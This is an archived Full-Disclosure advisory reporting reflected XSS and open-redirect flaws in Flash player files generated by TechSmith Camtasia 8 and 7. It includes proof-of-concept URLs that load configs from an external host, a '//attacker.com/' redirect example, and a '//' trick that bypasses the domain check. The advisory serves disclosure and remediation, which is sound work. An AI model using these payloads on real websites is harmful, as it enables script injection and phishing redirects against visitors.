lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CACckxB2wzuwKQGnqvs08a03TU0fSfODqTe9++PEqPfLR1K09PA@mail.gmail.com>
Date: Tue, 13 Jan 2015 15:05:19 +0000
From: Soroush Dalili <sd.bugreport@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Reflected XSS in Flash files of TechSmith Camtasia 8 & 7

Title: Reflected XSS in Flash files of TechSmith Camtasia 8 & 7
Author: Soroush Dalili (@irsdl)
Affected Software: TechSmith Camtasia v8.4.4 (latest 8.x) & v7.1.1 (latest
7.x)
Vendor URL: http://www.techsmith.com/camtasia-version-history.html
Vendor Status: vulnerable
CVE-ID: -

Camtasia 8 (v8.4.4 (latest 8.x) - vulnerable):
==============================================
TechSmith Camtasia is a screen recorder and video editor. After version 8,
it does not create SWF files that contain the video file. Instead, it
creates a MP4 file with HTML5 and SWF players.

However, SWF Player in version 8.4.3 (latest version at the time of
testing) was vulnerable to a reflected XSS attack.
After producing a Flash/HTML5 output, Camtasia creates the following flash
file:
ProjectName_controller.swf

This file is vulnerable to Open Redirect and XSS by loading a config file
that redirects the browser to an arbitrary destination after playing a
video. The destination URL can be attacker's URL (such as "//attacker.com/")
or a JavaScript that uses "javascript:" protocol.

The following shows a PoC code:
ProjectName_controller.swf?src=http://0me.me/demo/camtasia
/small.mp4&xmp=//0me.me/demo/camtasia/camtasia_v8.xml

This file can be found in any website that uses Camtasia projects for
instance techsmith.com website:
http://www.techsmith.com/includes/tsc_player.swf

Camtasia 7 (v7.1.1 (latest 7.x) - vulnerable):
==============================================
An XSS issue was resolved previously in generated Flash files of Camtasia 7
(http://web.appsec.ws/FlashExploitDatabase.php). TechSmith had patched this
vulnerability by implementing the "safeDomainCheck" function that checks
whether the domain is allowed or not in order to load the config file.
However, this protection can be bypassed by using "//" instead of "http://"
or "https://".

PoC code is as follows:
ProjectName_controller.swf?csConfigFile=//0me.me/demo/camtasia
/camtasia_v7.xml&.swf

Solution:
=========
Upgrade from Camtasia version 7 to 8. Use Camtasia HTML5 player instead of
the Flash player in Camtasia v8 and remove the old Flash files from
affected websites.

Disclosure Timeline:
====================
04-Nov-2014 – discovered
11-Nov-2014 – reported
14-Nov-2014 – initial acknowledge of receiving the issue from the vendor
17-Nov-2014 – the vendor confirmed that they know about these issues and
they do not have any ETA to patch the issue
18-Nov-2014 - the vendor confirmed that this issue can be publicly disclosed
07-Jan-2014 - the vendor also confirmed that this issue can be reported to
the security mail lists (double confirmation)!

Credit:
=======
Vulnerability found by Soroush Dalili (@irsdl)

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ